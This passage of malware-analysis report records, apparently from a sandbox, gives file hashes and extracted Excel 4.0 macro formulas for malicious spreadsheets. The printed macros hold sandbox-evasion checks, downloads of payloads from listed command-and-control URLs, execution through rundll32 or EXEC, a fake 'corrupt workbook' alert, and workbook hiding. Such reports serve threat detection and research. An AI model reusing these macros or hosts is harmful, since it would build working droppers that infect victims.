acted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ClB9YKbpIc\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4e1a1e596adc589924709a12586d3b4da6d9bee59aa1caeb68e775139047c787"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4e1a1e596adc589924709a12586d3b4da6d9bee59aa1caeb68e775139047c787","filesize":103941,"md5":"6017d99de88b37a06026f099c0f0046d","sha1":"90c43c24683cfa1250762a0ebe81de5f6a2487a7","sha256":"4e1a1e596adc589924709a12586d3b4da6d9bee59aa1caeb68e775139047c787","sha512":"9de9b3a61eff9473967a2b11e7b8c703ce148f051b696207702c5bc0a6ce1628bc44e659edb296f061e246d231c3732454df4c313c23612044701aca33740d01","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4e1a1e596adc589924709a12586d3b4da6d9bee59aa1caeb68e775139047c787.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\\CkkYKlI\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/crypt.dl\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4e2656777de55eb87b173ea1abe94aa2f4e4f01c1a58dc177229ccd4fc029b12"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4e2656777de55eb87b173ea1abe94aa2f4e4f01c1a58dc177229ccd4fc029b12","filesize":152576,"md5":"02ca0c033b43f45de086747fc389a71e","sha1":"caf418446600d1ede3a630bdf22e3c6dcc503776","sha256":"4e2656777de55eb87b173ea1abe94aa2f4e4f01c1a58dc177229ccd4fc029b12","sha512":"1a325e8e792045e37d625cc74f25b00ece7e623107e187d958cb12bf5174c4a875931b95ddb84a265160f5cb2699cf4df7fb15e491e3b2615a7f4059ba42683f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4e2656777de55eb87b173ea1abe94aa2f4e4f01c1a58dc177229ccd4fc029b12.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"v00eZUlehj\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4e2a443a6200acbcd61dc66113ddfa72297ed9473f67803fd7150560ab4b3d49"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4e2a443a6200acbcd61dc66113ddfa72297ed9473f67803fd7150560ab4b3d49","filesize":167936,"md5":"3302211b3af0a8832def5507540a76e4","sha1":"acdf57c550ba39a35ce7a10e04b1ade5c98df4c1","sha256":"4e2a443a6200acbcd61dc66113ddfa72297ed9473f67803fd7150560ab4b3d49","sha512":"c6546f2ed48735bebd75c02cbb3c8507ebdff6c2e8ba9ffcc36ae6fca418bcb7daa15c57e3086f09462671017ce702620cd10112628a222070d0fb692b46bcd8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4e2a443a6200acbcd61dc66113ddfa72297ed9473f67803fd7150560ab4b3d49.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6prZwUJvTz\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4e44916325eb760ccbe2e5108790e83398ea54338f7853bd911c38c716d6905a"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4e44916325eb760ccbe2e5108790e83398ea54338f7853bd911c38c716d6905a","filesize":113664,"md5":"9a5458afccbcab267fea5aaca9ee5838","sha1":"fafb6456d13127f5c08dc62babe6859c3e539e64","sha256":"4e44916325eb760ccbe2e5108790e83398ea54338f7853bd911c38c716d6905a","sha512":"b9af3c64f1fe22bbb072a03f3b6e7586816884488e43755e2abab6291f29269d32ec5cf702bd378603a11db0f8247fa01cb585a93e0ce442a9b11fc4a66b7c23","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4e44916325eb760ccbe2e5108790e83398ea54338f7853bd911c38c716d6905a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"KY1eBTDRYV\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4e4de592a6e71925b0a3ef2f8e9a3b169a3d17e92efa929e0ec2deeb90fcf313"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4e4de592a6e71925b0a3ef2f8e9a3b169a3d17e92efa929e0ec2deeb90fcf313","filesize":116224,"md5":"9d2bf32b92007787752ce6a62db71e06","sha1":"b0ee4eb179c4d9ef7a4c5897180a1afa918c3381","sha256":"4e4de592a6e71925b0a3ef2f8e9a3b169a3d17e92efa929e0ec2deeb90fcf313","sha512":"ff705ff62cc17163be5be99d56979bce524bc534dfff6b3bed83d2b094cd720662287e5ded794e9410ae2b3bf59813703b5aaa2e6f299a987e0acd74da8aedba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4e4de592a6e71925b0a3ef2f8e9a3b169a3d17e92efa929e0ec2deeb90fcf313.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"czS1fglsW2\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4e7036ecc3d3da8e12c4bc0791e2de35cd891fb2c866d3c103ba8d6cc629ad4a"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4e7036ecc3d3da8e12c4bc0791e2de35cd891fb2c866d3c103ba8d6cc629ad4a","filesize":206336,"md5":"0d566e8019e2e07e1bc6b117113e4267","sha1":"1db5fb035aa2dffca49aa16341e95a761f690904","sha256":"4e7036ecc3d3da8e12c4bc0791e2de35cd891fb2c866d3c103ba8d6cc629ad4a","sha512":"29d363743efa8033e9674135b38f27619c77465fc4b7ac1d9de542815538e396985b2cc765223b5834c65bc8d78ea8ccc5e2ddd01b439a0eb38b3a6a31d73088","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4e7036ecc3d3da8e12c4bc0791e2de35cd891fb2c866d3c103ba8d6cc629ad4a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SasARWfXQ2\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4e8406e593499e919dbbe3487b24017d13e4b6c1bf54da972493b8fdc3a19e72"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4e8406e593499e919dbbe3487b24017d13e4b6c1bf54da972493b8fdc3a19e72","filesize":206336,"md5":"d4f0fd5796c3d984243453b690e4c82f","sha1":"9e4314b45bf7a5119aaec9882f9b36c61c9a6068","sha256":"4e8406e593499e919dbbe3487b24017d13e4b6c1bf54da972493b8fdc3a19e72","sha512":"04118e08ef40e89b453b920185b8ffa5cdb91cc3b9c467c82aec1e5bd15375a2e75b09b6660807492220f87b61589ad57cbc806c455248f37b0c7c09294d1f5d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4e8406e593499e919dbbe3487b24017d13e4b6c1bf54da972493b8fdc3a19e72.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GrGCwp1IFW\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4ea260245d8bdd3f3231eb69483df41b24f21ce4acbf836d0b778b3e791d02e8"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4ea260245d8bdd3f3231eb69483df41b24f21ce4acbf836d0b778b3e791d02e8","filesize":116224,"md5":"3f104d511ab0b44b3ffae527f9fff766","sha1":"d838c6ee450fa3f61be695787d4f8b41697c4218","sha256":"4ea260245d8bdd3f3231eb69483df41b24f21ce4acbf836d0b778b3e791d02e8","sha512":"a70ca80909600c4dcd04aa26c3e69bd98471cef0387843ed9a23be343dfcb15fc30923454f29f560276d3991f4b750ba903da473262029a0c4ed31e2b9a80649","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4ea260245d8bdd3f3231eb69483df41b24f21ce4acbf836d0b778b3e791d02e8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tskKZE7tbh\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4ea97c26a52dae8843626c88d0dea2fea6d6adb4bb0517b567c7e6f421fc5339"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4ea97c26a52dae8843626c88d0dea2fea6d6adb4bb0517b567c7e6f421fc5339","filesize":160768,"md5":"24cfe76b42cfe52e15951898f5d928ea","sha1":"5d317927106fdce2afbc3e25a9cfe619621982e0","sha256":"4ea97c26a52dae8843626c88d0dea2fea6d6adb4bb0517b567c7e6f421fc5339","sha512":"abda96be1ae1f23736a5cf4b4ab7096cf683a2fe30540d45a77bdd6743b01f069a43343d2ae7f55cfaf7ee54726133dd12322f55127005fc97892fe2c796c492","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4ea97c26a52dae8843626c88d0dea2fea6d6adb4bb0517b567c7e6f421fc5339.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dYpqcorsdD\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4eafdf96e6306560563fad9df56b2d003f9f54e822005c00d38a95ba164c245a"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4eafdf96e6306560563fad9df56b2d003f9f54e822005c00d38a95ba164c245a","filesize":147968,"md5":"c51c0767ce86ca06225afaa42f076c7b","sha1":"5b423ce30c345d84c493e0158cc2e3b06ac860f0","sha256":"4eafdf96e6306560563fad9df56b2d003f9f54e822005c00d38a95ba164c245a","sha512":"d6862f364c801485247fe1ecd071a50653240aa3f359a788e67cff887d619ef95ff4e6994cb13ce356e1a2d7a94c4eca33c19b73d6becb49544ad20d4aab087d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4eafdf96e6306560563fad9df56b2d003f9f54e822005c00d38a95ba164c245a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"FUueCPKzw6\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4ed8c216cd506311a24aa5a4b3e285552c584798f7850b98d0fc454a4b52d0df"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4ed8c216cd506311a24aa5a4b3e285552c584798f7850b98d0fc454a4b52d0df","filesize":104448,"md5":"e304518d4524605d7a910c25541eecc4","sha1":"f5c5052de834aca8dbb38f12a5f87cf7963c15cd","sha256":"4ed8c216cd506311a24aa5a4b3e285552c584798f7850b98d0fc454a4b52d0df","sha512":"b611ec75e676f2071cd8fba0c35940ad85f6a6aa72cb962192f210383c3ee0fb4ecd4876e1b6f9f661c32ef6d98b96a29b4c66f2fa5b482cbc416caa343d7726","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4ed8c216cd506311a24aa5a4b3e285552c584798f7850b98d0fc454a4b52d0df.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"zzlM3rZMm9\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4ef117dab6d5e6379a05fe3f44efbd88e22029c0255b923d7fc0171bf3498479"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4ef117dab6d5e6379a05fe3f44efbd88e22029c0255b923d7fc0171bf3498479","filesize":112128,"md5":"c8bc925f2b5b1b1bd543a006b885a6f8","sha1":"42ab47bbef89e8af2296ff292583b00b3771219f","sha256":"4ef117dab6d5e6379a05fe3f44efbd88e22029c0255b923d7fc0171bf3498479","sha512":"c7461eb73fbd1c309cd2cba3c0abbf065c54e454a74e1099295b566b9d3bef14548d2a9a59e2a92b0b5784d1cf159747b8a808d56d690841ccea386d19ce959f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4ef117dab6d5e6379a05fe3f44efbd88e22029c0255b923d7fc0171bf3498479.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4ef5f0c91a4acaa94dcb014e57997fd1ff003636d9a95700a34e2ae22346b34a"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4ef5f0c91a4acaa94dcb014e57997fd1ff003636d9a95700a34e2ae22346b34a","filesize":152576,"md5":"ef2eed5a96be84b0f5d31ce25d504304","sha1":"8b6432995ece5ba0c543a0ac60a17c149dff25b3","sha256":"4ef5f0c91a4acaa94dcb014e57997fd1ff003636d9a95700a34e2ae22346b34a","sha512":"a878db124ed8a42c5a4b8ae17bdaf706a3b4e33c39574670e2885abe58d71907e0bd72f6f2581b3f0d122bc733621b7feecb9b709a3e21f615a3e593e4b41624","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4ef5f0c91a4acaa94dcb014e57997fd1ff003636d9a95700a34e2ae22346b34a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3U0cMxi6oD\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4ef94005625a274f7e71d1291c89f2b1f631cf5fde2c3f9d945ec45f36a06a38"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4ef94005625a274f7e71d1291c89f2b1f631cf5fde2c3f9d945ec45f36a06a38","filesize":226304,"md5":"49d41e7fb8ab5a4d274bc4ceeca1bcbb","sha1":"3588bd1ff6f5cd59feb47768055fbccd3a5894e6","sha256":"4ef94005625a274f7e71d1291c89f2b1f631cf5fde2c3f9d945ec45f36a06a38","sha512":"3d4e85b387aa222fbd476a8612273731ad904669a6bcf4534476b5ed5af1fd6529ecd9785c117b4ce50c1b5644cef19409fe7874a520af8b3c53b9f095a40108","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4ef94005625a274f7e71d1291c89f2b1f631cf5fde2c3f9d945ec45f36a06a38.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 